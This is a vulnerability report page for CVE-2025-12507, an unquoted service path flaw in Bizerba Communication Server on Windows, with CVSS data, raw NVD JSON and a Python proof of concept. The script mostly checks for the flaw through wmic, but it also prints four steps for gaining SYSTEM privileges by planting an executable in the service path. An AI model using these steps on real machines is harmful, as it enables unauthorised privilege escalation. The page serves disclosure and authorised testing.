Security Vulnerability Report
中文
CVE-2025-12507 CVSS 8.8 HIGH

CVE-2025-12507

Published: 2025-10-31 16:15:39
Last Modified: 2026-04-15 00:35:42
Source: 0beee27a-7d8c-424f-8e46-ac453fa147e6

Description

The service Bizerba Communication Server (BCS) has an unquoted service path. Due to the way Windows searches the executable for the BCS service, malicious programs can be executed.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Bizerba Communication Server (BCS) - 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-12507 PoC - Bizerba Communication Server Unquoted Service Path This PoC demonstrates how to check for unquoted service paths in Windows. Note: This is for educational and authorized testing purposes only. """ import subprocess import sys def check_unquoted_service_path(service_name): """ Query Windows service configuration to check for unquoted paths. """ try: cmd = f'wmic service where "name=\\'{service_name}\\'" get pathname,state,startmode' result = subprocess.check_output(cmd, shell=True, text=True) print(f"[+] Service: {service_name}") print(result) # Check if path contains spaces and is not quoted lines = result.strip().split('\n') if len(lines) > 1: path_info = lines[1].strip() if ' ' in path_info and not path_info.startswith('"'): print(f"[!] VULNERABLE: Unquoted path with spaces detected!") print(f"[!] Path: {path_info}") return True except Exception as e: print(f"[-] Error: {e}") return False def exploit_unquoted_path(target_path, malicious_exe): """ Simulate exploitation by copying malicious exe to intermediate path. WARNING: This is for authorized testing only. """ print(f"[!] To exploit this vulnerability:") print(f"[!] 1. Identify an intermediate directory with write permissions") print(f"[!] 2. Place malicious executable in: {target_path}") print(f"[!] 3. Wait for service restart or trigger restart") print(f"[!] 4. Malicious code will execute with SYSTEM privileges") if __name__ == "__main__": # Check for Bizerba Communication Server service_name = "BCS" # Adjust service name as needed if check_unquoted_service_path(service_name): print("\n[+] Vulnerability confirmed!") else: print("[-] Service not found or not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12507", "sourceIdentifier": "0beee27a-7d8c-424f-8e46-ac453fa147e6", "published": "2025-10-31T16:15:39.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The service Bizerba Communication Server (BCS) has an unquoted service path. Due to the way Windows searches the executable for the BCS service, malicious programs can be executed."}], "metrics": {"cvssMetricV31": [{"source": "0beee27a-7d8c-424f-8e46-ac453fa147e6", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "0beee27a-7d8c-424f-8e46-ac453fa147e6", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.bizerba.com/downloads/global/information-security/2025/bizerba-sa-2025-0005.pdf", "source": "0beee27a-7d8c-424f-8e46-ac453fa147e6"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.